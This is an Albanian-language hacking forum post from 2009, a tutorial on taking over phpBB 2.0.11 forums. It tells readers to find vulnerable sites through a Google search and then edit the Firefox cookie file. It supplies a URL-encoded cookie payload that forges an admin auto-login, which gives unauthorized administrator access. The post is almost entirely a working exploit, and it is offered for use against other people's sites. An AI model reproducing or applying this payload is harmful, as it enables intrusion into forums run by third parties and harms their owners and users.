AHG-CREW


 
ForumGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 Si te Hackojm nje Forum PHPBB

Shko poshtė 
AutoriMesazh
ABI
Administrator
Administrator


Numri i postimeve : 23
Registration date : 13/04/2008

MesazhTitulli: Si te Hackojm nje Forum PHPBB   Mon Jan 19, 2009 10:46 am

Me e lehte per me hack ne pergjithsi behet me firefox te cilen mund ta merrni ne www.getfirefox.com (http://www.getfirefox.com) dhe eshte falas.
Mbasi qe keni marr Mozilla Firefox (web browser sikur IE Internet Explorer) duhet te zgjedhni forumin cilin doni me e hacku.
Un do tju tregoj se si me hacku forumet e verzionit te phpbb 2.0.11 dhe per kete kerkoni ne google "powered by phpbb 2.0.11" Mbasi qe keni zgjedh forumin shkoni ne
Start > Run >
dhe e shkruani keshtu
C: Documents and Settings\EMRI\Application DataMozillaFirefoxProfilesexwtkkyi.default
Aty ku eshte EMRI ju vendosni emrin e userit qe perdorni ju.
Tani ju hapet nje folder dhe mbrenda atij eshte cookies celeni ate dhe kerrkoni emrin e webit te cilin keni gjet per te hackuar psh keshtu www.emriwebit.com FALSE
/ FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
tani zevendesoni kete pjese te cookie kodi: a%3A0%3A%7B%7D
me kete Kodi:


KODI:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
dhe pastaj mbylleni cookie dhe bejeni save.tani mbylleni firefox dhe hapeni prap dhe futni adresen e forumit qe deshet me hack dhe nqs keni pas sukses do jeni i loguar si admin ne at web, por nese webi ka qene i mbrojtur edhe pse ka pas phpbb 2.0.11 ateher smundeni me u logu si admin
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
Si te Hackojm nje Forum PHPBB
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
AHG-CREW :: E-Books & Tutorials-
Kėrce tek: